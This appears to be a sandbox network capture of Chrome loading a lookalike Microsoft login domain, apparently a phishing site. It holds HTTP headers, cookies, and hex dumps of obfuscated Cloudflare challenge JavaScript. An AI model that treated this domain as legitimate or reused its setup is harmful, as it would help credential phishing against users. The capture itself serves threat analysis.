                                                                                                                              Data Ascii: +=1);for(Q=0,R=Math[ad(244)](2,2),M=1;R!=M;S=O&N,O>>=1,O==0&&(O=E,N=F(P++)),Q|=(0<S?1:0)*M,M<<=1);switch(Q){case 0:for(Q=0,R=Math[ad(244)](2,8),M=1;M!=R;S=O&N,O>>=1,O==0&&(O=E,N=F(P++)),Q|=(0<S?1:0)*M,M<<=1);T=d(Q);break;case 1:for(Q=0,R=Math[ad(244)](2,1
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 36 29 5d 7c 7c 43 5b 61 37 28 33 32 38 29 5d 2c 27 6e 2e 27 2c 44 29 2c 44 3d 56 67 75 79 36 28 43 2c 42 5b 61 37 28 33 30 38 29 5d 2c 27 64 2e 27 2c 44 29 2c 67 5b 61 37 28 32 37 37 29 5d 5b 61 37 28 33 31 38 29 5d 28 42 29 2c 45 3d 7b 7d 2c 45 2e 72 3d 44 2c 45 2e 65 3d 6e 75 6c 6c 2c 45 7d 63 61 74 63 68 28 47 29 7b 72 65 74 75 72 6e 20 46 3d 7b 7d 2c 46 2e 72 3d 7b 7d 2c 46 2e 65 3d 47 2c 46 7d 7d 66 75 6e 63 74 69 6f 6e 20 69 28 58 2c 63 2c 64 2c 42 2c 43 29 7b 69 66 28 28 58 3d 56 2c 63 3d 66 5b 58 28 32 36 37 29 5d 2c 64 3d 33 36 30 30 2c 63 2e 74 29 26 26 28 42 3d 4d 61 74 68 5b 58 28 32 32 33 29 5d 28 2b 61 74 6f 62 28 63 2e 74 29 29 2c 43 3d 4d 61 74 68 5b 58 28 32 32 33 29 5d 28 44 61 74 65 5b 58 28 33 31 33 29 5d 28 29 2f 31 65 33 29 2c 43 2d
                                                                                                                              Data Ascii: 6)]||C[a7(328)],'n.',D),D=Vguy6(C,B[a7(308)],'d.',D),g[a7(277)][a7(318)](B),E={},E.r=D,E.e=null,E}catch(G){return F={},F.r={},F.e=G,F}}function i(X,c,d,B,C){if((X=V,c=f[X(267)],d=3600,c.t)&&(B=Math[X(223)](+atob(c.t)),C=Math[X(223)](Date[X(313)]()/1e3),C-
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 2c 73 70 6c 69 63 65 2c 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 2c 66 75 6e 63 74 69 6f 6e 2c 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 69 73 4e 61 4e 2c 72 65 61 64 79 53 74 61 74 65 2c 63 68 61 72 41 74 2c 72 65 70 6c 61 63 65 2c 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 2c 6f 6e 74 69 6d 65 6f 75 74 2c 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 62 6f 64 79 2c 5f 63 66 5f 63 68 6c 5f 6f 70 74 3b 6d 70 55 61 4c 32 3b 46 78 4f 6e 72 33 3b 4b 55 6a 49 78 33 3b 74 6c 4c 72 4b 32 3b 59 76 50 64 36 3b 65 58 44 6c 4c 34 3b 74 50 6f 68 52 32 3b 4a 65 75 68 67 31 3b 46 72 4e 42 69 35 3b 54 4d 4d 78 35 3b 48 63 54 45 49 33 3b 69 48 77 78 4d 33 3b 56 67 75 79 36 3b 48 76 6d 72 33 3b 4f 75 57 54 37 2c 74 69 6d 65 6f 75 74 2c 73 65 6e 64 2c 75 6e 64
                                                                                                                              Data Ascii: ,splice,__CF$cv$params,function,hasOwnProperty,isNaN,readyState,charAt,replace,getOwnPropertyNames,ontimeout,fromCharCode,body,_cf_chl_opt;mpUaL2;FxOnr3;KUjIx3;tlLrK2;YvPd6;eXDlL4;tPohR2;Jeuhg1;FrNBi5;TMMx5;HcTEI3;iHwxM3;Vguy6;Hvmr3;OuWT7,timeout,send,und
                                                                                                                              2024-10-04 13:11:02 UTC509INData Raw: 5a 28 33 32 35 29 5d 2c 49 5b 5a 28 32 35 37 29 5d 3d 66 5b 5a 28 32 39 36 29 5d 5b 5a 28 32 35 37 29 5d 2c 49 5b 5a 28 33 33 32 29 5d 3d 66 5b 5a 28 32 39 36 29 5d 5b 5a 28 33 33 32 29 5d 2c 4a 3d 49 2c 47 5b 5a 28 32 32 34 29 5d 28 48 2c 46 2c 21 21 5b 5d 29 2c 47 5b 5a 28 32 37 39 29 5d 3d 32 35 30 30 2c 47 5b 5a 28 32 37 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 47 5b 5a 28 33 30 31 29 5d 28 5a 28 32 39 30 29 2c 5a 28 32 32 39 29 29 2c 4b 3d 7b 7d 2c 4b 5b 5a 28 33 32 32 29 5d 3d 44 2c 4b 5b 5a 28 32 39 37 29 5d 3d 4a 2c 4b 5b 5a 28 32 39 35 29 5d 3d 5a 28 32 38 32 29 2c 4c 3d 7a 5b 5a 28 32 33 33 29 5d 28 4a 53 4f 4e 5b 5a 28 33 30 35 29 5d 28 4b 29 29 5b 5a 28 32 37 33 29 5d 28 27 2b 27 2c 5a 28 33 33 31 29 29 2c 47 5b 5a 28 32 38 30 29 5d
                                                                                                                              Data Ascii: Z(325)],I[Z(257)]=f[Z(296)][Z(257)],I[Z(332)]=f[Z(296)][Z(332)],J=I,G[Z(224)](H,F,!![]),G[Z(279)]=2500,G[Z(275)]=function(){},G[Z(301)](Z(290),Z(229)),K={},K[Z(322)]=D,K[Z(297)]=J,K[Z(295)]=Z(282),L=z[Z(233)](JSON[Z(305)](K))[Z(273)]('+',Z(331)),G[Z(280)]


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              17192.168.2.1749786104.26.13.694432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:02 UTC496OUTGET /cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js? HTTP/1.1
                                                                                                                              Host: l0gin-microso.ftlivedocs.tech
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4
                                                                                                                              2024-10-04 13:11:02 UTC664INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:02 GMT
                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                              Content-Length: 7992
                                                                                                                              Connection: close
                                                                                                                              cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                              x-content-type-options: nosniff
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RSn3xFT4V4SyVvkpqPRY5B2042zQCOcUZ6dZqYdkywnZLWY1N6eErgEY6YE6gVmDam6agBu02ECI6LaWFSe8curNwW6DHa%2Fwm8lutAX74OxkfER9wVanUAE%2BBVNQImkMkySkLsxu3m%2FD%2FqRXcwH1"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a621be242c7-EWR
                                                                                                                              2024-10-04 13:11:02 UTC705INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 56 2c 67 2c 68 2c 69 2c 6a 2c 6e 2c 6f 2c 76 29 7b 56 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 55 2c 66 2c 43 29 7b 66 6f 72 28 55 3d 62 2c 66 3d 64 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 43 3d 70 61 72 73 65 49 6e 74 28 55 28 31 37 39 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 55 28 31 34 39 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 55 28 32 31 39 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 55 28 31 39 37 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 55 28 31 35 32 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 31 33 32 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 55 28 31 34 37 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e
                                                                                                                              Data Ascii: window._cf_chl_opt={cFPWv:'g'};~function(V,g,h,i,j,n,o,v){V=b,function(d,e,U,f,C){for(U=b,f=d();!![];)try{if(C=parseInt(U(179))/1*(parseInt(U(149))/2)+parseInt(U(219))/3+parseInt(U(197))/4+parseInt(U(152))/5+-parseInt(U(132))/6+parseInt(U(147))/7+-parseIn
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 29 3a 66 75 6e 63 74 69 6f 6e 28 4e 2c 61 31 2c 4f 29 7b 66 6f 72 28 61 31 3d 61 30 2c 4e 5b 61 31 28 31 38 33 29 5d 28 29 2c 4f 3d 30 3b 4f 3c 4e 5b 61 31 28 31 37 37 29 5d 3b 4e 5b 4f 5d 3d 3d 3d 4e 5b 4f 2b 31 5d 3f 4e 5b 61 31 28 32 31 37 29 5d 28 4f 2b 31 2c 31 29 3a 4f 2b 3d 31 29 3b 72 65 74 75 72 6e 20 4e 7d 28 48 29 2c 49 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 49 3d 49 5b 61 30 28 31 39 34 29 5d 5b 61 30 28 31 35 37 29 5d 28 49 29 2c 4a 3d 30 3b 4a 3c 48 5b 61 30 28 31 37 37 29 5d 3b 4b 3d 48 5b 4a 5d 2c 4c 3d 6c 28 43 2c 44 2c 4b 29 2c 49 28 4c 29 3f 28 4d 3d 4c 3d 3d 3d 27 73 27 26 26 21 43 5b 61 30 28 31 36 34 29 5d 28 44 5b 4b 5d 29 2c 61 30 28 31 34 33 29 3d 3d 3d 45 2b 4b 3f 47 28 45 2b 4b 2c 4c 29 3a 4d 7c 7c 47
                                                                                                                              Data Ascii: ):function(N,a1,O){for(a1=a0,N[a1(183)](),O=0;O<N[a1(177)];N[O]===N[O+1]?N[a1(217)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0(194)][a0(157)](I),J=0;J<H[a0(177)];K=H[J],L=l(C,D,K),I(L)?(M=L==='s'&&!C[a0(164)](D[K]),a0(143)===E+K?G(E+K,L):M||G
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 3d 4f 3c 3c 31 2e 30 34 7c 54 2c 50 3d 3d 45 2d 31 3f 28 50 3d 30 2c 4e 5b 61 36 28 32 31 33 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3d 30 2c 47 2b 2b 29 3b 66 6f 72 28 54 3d 4a 5b 61 36 28 31 36 37 29 5d 28 30 29 2c 47 3d 30 3b 31 36 3e 47 3b 4f 3d 31 26 54 7c 4f 3c 3c 31 2e 30 33 2c 50 3d 3d 45 2d 31 3f 28 50 3d 30 2c 4e 5b 61 36 28 32 31 33 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3e 3e 3d 31 2c 47 2b 2b 29 3b 7d 4b 2d 2d 2c 30 3d 3d 4b 26 26 28 4b 3d 4d 61 74 68 5b 61 36 28 31 39 39 29 5d 28 32 2c 4d 29 2c 4d 2b 2b 29 2c 64 65 6c 65 74 65 20 49 5b 4a 5d 7d 65 6c 73 65 20 66 6f 72 28 54 3d 48 5b 4a 5d 2c 47 3d 30 3b 47 3c 4d 3b 4f 3d 54 26 31 2e 31 38 7c 4f 3c 3c 31 2e 34 33 2c 45 2d 31 3d 3d 50 3f 28 50 3d 30 2c 4e 5b
                                                                                                                              Data Ascii: =O<<1.04|T,P==E-1?(P=0,N[a6(213)](F(O)),O=0):P++,T=0,G++);for(T=J[a6(167)](0),G=0;16>G;O=1&T|O<<1.03,P==E-1?(P=0,N[a6(213)](F(O)),O=0):P++,T>>=1,G++);}K--,0==K&&(K=Math[a6(199)](2,M),M++),delete I[J]}else for(T=H[J],G=0;G<M;O=T&1.18|O<<1.43,E-1==P?(P=0,N[
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 28 30 3c 53 3f 31 3a 30 29 2c 4d 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 51 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 39 28 31 39 39 29 5d 28 32 2c 38 29 2c 4d 3d 31 3b 4d 21 3d 52 3b 53 3d 4e 26 4f 2c 4f 3e 3e 3d 31 2c 4f 3d 3d 30 26 26 28 4f 3d 45 2c 4e 3d 46 28 50 2b 2b 29 29 2c 51 7c 3d 28 30 3c 53 3f 31 3a 30 29 2a 4d 2c 4d 3c 3c 3d 31 29 3b 54 3d 65 28 51 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 39 28 31 39 39 29 5d 28 32 2c 31 36 29 2c 4d 3d 31 3b 52 21 3d 4d 3b 53 3d 4e 26 4f 2c 4f 3e 3e 3d 31 2c 30 3d 3d 4f 26 26 28 4f 3d 45 2c 4e 3d 46 28 50 2b 2b 29 29 2c 51 7c 3d 28 30 3c 53 3f 31 3a 30 29 2a 4d 2c 4d 3c 3c 3d 31 29 3b 54 3d 65 28 51 29 3b 62 72 65 61 6b 3b 63
                                                                                                                              Data Ascii: (0<S?1:0),M<<=1);switch(Q){case 0:for(Q=0,R=Math[a9(199)](2,8),M=1;M!=R;S=N&O,O>>=1,O==0&&(O=E,N=F(P++)),Q|=(0<S?1:0)*M,M<<=1);T=e(Q);break;case 1:for(Q=0,R=Math[a9(199)](2,16),M=1;R!=M;S=N&O,O>>=1,0==O&&(O=E,N=F(P++)),Q|=(0<S?1:0)*M,M<<=1);T=e(Q);break;c
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 31 38 32 29 2c 61 63 28 32 30 36 29 29 2c 43 5b 61 63 28 32 32 36 29 5d 28 4a 53 4f 4e 5b 61 63 28 31 37 31 29 5d 28 66 29 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 63 2c 64 2c 65 29 7b 72 65 74 75 72 6e 20 65 3d 61 28 29 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 29 7b 72 65 74 75 72 6e 20 66 3d 66 2d 31 33 31 2c 68 3d 65 5b 66 5d 2c 68 7d 2c 62 28 63 2c 64 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 61 62 2c 64 2c 65 2c 66 2c 43 29 7b 69 66 28 28 61 62 3d 56 2c 64 3d 67 5b 61 62 28 31 38 30 29 5d 2c 65 3d 33 36 30 30 2c 64 2e 74 29 26 26 28 66 3d 4d 61 74 68 5b 61 62 28 31 33 34 29 5d 28 2b 61 74 6f 62 28 64 2e 74 29 29 2c 43 3d 4d 61 74 68 5b 61 62 28 31 33 34 29 5d 28 44 61 74 65 5b 61 62 28 31 34 31 29 5d 28 29 2f 31 65 33 29 2c 43 2d 66 3e 65 29 29
                                                                                                                              Data Ascii: 182),ac(206)),C[ac(226)](JSON[ac(171)](f))}function b(c,d,e){return e=a(),b=function(f,g,h){return f=f-131,h=e[f],h},b(c,d)}function y(ab,d,e,f,C){if((ab=V,d=g[ab(180)],e=3600,d.t)&&(f=Math[ab(134)](+atob(d.t)),C=Math[ab(134)](Date[ab(141)]()/1e3),C-f>e))
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 61 70 70 65 6e 64 43 68 69 6c 64 2c 63 6c 69 65 6e 74 49 6e 66 6f 72 6d 61 74 69 6f 6e 2c 63 68 61 72 41 74 2c 6f 62 6a 65 63 74 2c 4d 65 73 73 61 67 65 3a 20 2c 72 65 6d 6f 76 65 43 68 69 6c 64 2c 6e 75 6d 62 65 72 2c 66 72 6f 6d 2c 36 34 37 37 32 34 45 48 4f 71 64 64 2c 43 6f 6e 74 65 6e 74 2d 74 79 70 65 2c 66 6c 6f 6f 72 2c 62 69 67 69 6e 74 2c 20 2d 20 2c 73 79 6d 62 6f 6c 2c 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 2c 6a 6f 69 6e 2c 46 75 6e 63 74 69 6f 6e 2c 6e 6f 77 2c 25 32 62 2c 64 2e 63 6f 6f 6b 69 65 2c 62 6f 64 79 2c 6e 61 76 69 67 61 74 6f 72 2c 2f 6a 73 64 2f 72 2f 2c 31 36 35 36 35 30 31 7a 4c 62 41 6d 68 2c 63 46 50 57 76 2c 31 30 39 38 30 47 78 43 6d 42 74 2c 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 2c 68 61 73 4f 77 6e 50 72
                                                                                                                              Data Ascii: appendChild,clientInformation,charAt,object,Message: ,removeChild,number,from,647724EHOqdd,Content-type,floor,bigint, - ,symbol,createElement,join,Function,now,%2b,d.cookie,body,navigator,/jsd/r/,1656501zLbAmh,cFPWv,10980GxCmBt,onreadystatechange,hasOwnPr
                                                                                                                              2024-10-04 13:11:02 UTC442INData Raw: 3d 7b 7d 2c 4a 5b 61 64 28 31 35 35 29 5d 3d 67 5b 61 64 28 32 30 33 29 5d 5b 61 64 28 31 35 35 29 5d 2c 4a 5b 61 64 28 32 32 32 29 5d 3d 67 5b 61 64 28 32 30 33 29 5d 5b 61 64 28 32 32 32 29 5d 2c 4a 5b 61 64 28 31 38 35 29 5d 3d 67 5b 61 64 28 32 30 33 29 5d 5b 61 64 28 31 38 35 29 5d 2c 4b 3d 4a 2c 48 5b 61 64 28 31 38 38 29 5d 28 49 2c 47 2c 21 21 5b 5d 29 2c 48 5b 61 64 28 31 35 39 29 5d 3d 32 35 30 30 2c 48 5b 61 64 28 31 39 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 48 5b 61 64 28 31 36 39 29 5d 28 61 64 28 31 33 33 29 2c 61 64 28 31 36 30 29 29 2c 4c 3d 7b 7d 2c 4c 5b 61 64 28 32 31 36 29 5d 3d 45 2c 4c 5b 61 64 28 31 39 30 29 5d 3d 4b 2c 4c 5b 61 64 28 31 38 31 29 5d 3d 61 64 28 31 38 34 29 2c 4d 3d 76 5b 61 64 28 32 30 32 29 5d 28 4a 53
                                                                                                                              Data Ascii: ={},J[ad(155)]=g[ad(203)][ad(155)],J[ad(222)]=g[ad(203)][ad(222)],J[ad(185)]=g[ad(203)][ad(185)],K=J,H[ad(188)](I,G,!![]),H[ad(159)]=2500,H[ad(191)]=function(){},H[ad(169)](ad(133),ad(160)),L={},L[ad(216)]=E,L[ad(190)]=K,L[ad(181)]=ad(184),M=v[ad(202)](JS


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              18192.168.2.1749787104.26.12.694432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:02 UTC725OUTPOST /cdn-cgi/challenge-platform/h/g/jsd/r/8cd56a496a3b5e6a HTTP/1.1
                                                                                                                              Host: l0gin-microso.ftlivedocs.tech
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 15828
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Content-Type: application/json
                                                                                                                              Accept: */*
                                                                                                                              Origin: https://l0gin-microso.ftlivedocs.tech
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4
                                                                                                                              2024-10-04 13:11:02 UTC15828OUTData Raw: 7b 22 77 70 22 3a 22 32 6d 74 37 46 48 78 64 46 54 74 46 58 33 56 78 61 78 63 30 66 37 48 55 30 35 72 30 75 67 75 47 47 48 64 78 5a 2b 30 6a 73 55 77 73 50 74 30 52 6a 4b 4f 56 73 54 78 39 30 58 61 74 53 6f 6d 6d 30 35 2d 47 30 57 30 47 55 47 74 78 30 45 47 78 4d 56 6b 37 2d 54 6d 38 62 43 37 6a 73 51 6d 72 35 34 39 63 33 53 44 37 4d 51 46 71 72 36 78 34 2b 6a 2d 75 30 46 74 74 4a 75 52 48 38 6f 30 24 53 6f 50 4e 38 30 4e 37 33 52 30 48 71 74 30 75 37 48 48 37 51 58 37 75 30 78 73 30 66 54 7a 30 78 36 38 30 79 4c 64 35 53 6d 4b 78 35 2d 6f 74 30 48 4c 38 30 48 56 4f 66 30 4f 48 30 78 38 45 50 65 74 43 39 72 55 48 53 48 78 4e 4d 72 6d 2b 46 51 41 6c 4e 6a 30 67 37 48 75 69 6e 6d 30 64 7a 6d 73 33 50 6a 70 45 53 30 4f 6c 4e 2d 51 67 35 37 30 65 2d 67 50 75
                                                                                                                              Data Ascii: {"wp":"2mt7FHxdFTtFX3Vxaxc0f7HU05r0uguGGHdxZ+0jsUwsPt0RjKOVsTx90XatSomm05-G0W0GUGtx0EGxMVk7-Tm8bC7jsQmr549c3SD7MQFqr6x4+j-u0FttJuRH8o0$SoPN80N73R0Hqt0u7HH7QX7u0xs0fTz0x680yLd5SmKx5-ot0HL80HVOf0OH0x8EPetC9rUHSHxNMrm+FQAlNj0g7Huinm0dzms3PjpES0OlN-Qg570e-gPu
                                                                                                                              2024-10-04 13:11:02 UTC1246INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:02 GMT
                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.ftlivedocs.tech; HttpOnly; Secure; SameSite=None
                                                                                                                              Set-Cookie: cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5; Path=/; Expires=Sat, 04-Oct-25 13:11:02 GMT; Domain=.ftlivedocs.tech; HttpOnly; Secure; SameSite=None; Partitioned
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OhxstfIIHb0QLgbTF%2Bq4KAirmMfSHaVsOzFstzZYzFO8ro1qIdsxfkYhHz%2FxoO5mf1q4tvFTeKzjPsK0ApKLT4Mv5IfG%2FMcbP1yGT0fz9TbSpxw3hQV9qrEj4UECyAqYuLQcgqetlpSNHmCLWxV%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a625f65c40e-EWR


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              19192.168.2.1749789104.18.95.414432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:02 UTC812OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/bth64/0x4AAAAAAAwd9hw5rvoDjM7I/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:02 UTC1369INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:02 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Content-Length: 164874
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              cross-origin-embedder-policy: require-corp
                                                                                                                              content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                              accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                              cross-origin-opener-policy: same-origin
                                                                                                                              document-policy: js-profiling
                                                                                                                              referrer-policy: same-origin
                                                                                                                              origin-agent-cluster: ?1
                                                                                                                              critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                              2024-10-04 13:11:02 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 64 35 36 61 36 33 30 63 66 37 34 31 65 33 2d 45 57 52 0d 0a 0d 0a
                                                                                                                              Data Ascii: Server: cloudflareCF-RAY: 8cd56a630cf741e3-EWR
                                                                                                                              2024-10-04 13:11:02 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
